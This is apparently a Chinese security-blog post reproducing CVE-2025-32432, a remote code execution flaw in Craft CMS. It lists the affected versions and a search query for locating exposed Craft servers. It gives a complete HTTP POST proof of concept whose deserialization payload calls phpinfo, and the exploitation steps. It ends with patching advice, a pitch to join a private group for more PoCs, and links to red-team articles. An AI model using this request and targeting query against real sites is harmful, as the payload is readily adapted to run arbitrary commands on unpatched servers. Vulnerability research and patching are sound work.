漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432
漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432
原创 零日安全实验室 零日安全实验室 2025-05-04 22:00
免责声明!
本
公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
大 纲
0x01 漏洞概述
0x02 影响范围
0x03 资产测绘
0x04 漏洞利用及复现过程
0x05 修复方案
0x01 漏洞概述
Craft CMS
是一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。
0x02 影响范围
3.0.0-RC1 <= Craft <= 3.9.15
4.0.0-RC1 <=
Craft <= 4.14.15
5.0.0-RC1 <=
Craft <= 5.6.17
0x03 资产测绘
header="X-Powered-By: Craft CMS" || banner="X-Powered-By: Craft CMS"
0x04 漏洞利用及复现过程
触发的POC:
POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
Host: xxx.xxx.xxx.xxx
Cookie: CRAFT_CSRF_TOKEN=daf6b64e2d0beca2810a1f2ba142ace3635bff363e262e10ebaa4e82b0fe9a4aa%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22jvyEd4GLStsd2iruHCZ_pgYXRkKWNLFc3_aWQX1q%22%3B%7D
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Csrf-Token: bzFvT_mLmqlXm01ioxrWVQ3upJAehcZVaB5aNy52BVwY0mEZ_owjMwVHFgqdv93lBO8-BpFzpCBFrf7PbuKfDTp1EWBgOkM_K40ATq_UEkI=
Content-Length: 217
{"assetId":11,"handle":{"width":123,"height":123,"as session":{"class":"craft\\behaviors\\FieldLayoutBehavior","__class":"GuzzleHttp\\Psr7\\FnStream","__construct()":[[]],"_fn_close":"phpinfo"}},"9qsccmw8lve":"="}
复现过程:
S1:抓取xxx.xxx.xxx.xxx/
index.php?p=admin/actions/assets/generate-transform数据包:
S2:获取
CRAFT_CSRF_TOKEN:
S3:获取
X-Csrf-Token:
S4:构造payload:
{"assetId":11,"handle":{"width":123,"height":123,"as session":{"class":"craft\\behaviors\\FieldLayoutBehavior","__class":"GuzzleHttp\\Psr7\\FnStream","__construct()":[[]],"_fn_close":"phpinfo"}},"9qsccmw8lve":"="}
S5:复现成功:
0x05 修复建议
– 重置安全密钥(
php craft setup/security-key
)。
-
轮换数据库凭证及
API
密钥,强制所有用户修改密码。 -
在防火墙拦截包含
“__class”
的
POST
请求。 -
安装官方临时补丁库
“Craft CMS Security Patches”
。 -
立即升级,
安装官方安全版本(
3.9.15
、
4.14.15
、
5.6.17
)。
CVE-2025-32432
是
2025
年迄今影响最广泛的
CMS
漏洞之一,其低攻击门槛与高危害性已引发全球安全团队高度警戒。
Craft CMS
用户需立即行动,避免成为下一批受害者。
关注并私信进社群获取POC!
没看够~?欢迎关注!
往期精彩推荐
内网篇 |【干货】探秘高版本系统:密码抓取技术与方法解析,建议收藏!!!
面试篇 | 网安春招大厂面试题精选:看这一篇就够了,必看!!!(2)
面试篇 | 网安春招大厂面试题精选:看这一篇就够了,必看!!!(1)
工具篇 | MuMu模拟器安装证书+burpsuite抓包,APP&小程序渗透必备!!!
内网篇 | 巧妙使用CDN隐藏CobaltStrike特征,红队必备!!!
内网篇 | 干货!一文秒懂Kerberos认证:全面剖析与实践指南
内网篇 | CobaltStrike:深入探索本地信息收集技巧,干货!!!
漏洞复现篇 | Vite任意文件读取漏洞:CVE-2025-30208,最新!
Web篇 |【全网最详细】Apache CC反序列化漏洞:CC1调用链POC构造过程,干货!!!(上)
Web篇 | 一文掌握Apache Commons Collections反序列化漏洞,速看!!!(上)
工具篇 | 把deepseek塞进微信:实现自动回复消息!王炸!!!
内网篇 | 【送给小白的】内网信息收集:端口扫描详解,干货!!!
漏洞复现篇 | CVE-2025-24813 Tomcat,最新RCE漏洞,速看!!!
内网篇 | 干货!深入解析NTLM协议:挑战-响应认证机制揭秘,红队必备!
SRC篇 | 今天你挖洞了吗?Webpack未授权访问漏洞,实战!
Web篇 | 最强sqlmap联动burpsuite+WAF绕过姿势,Hvv面试必备!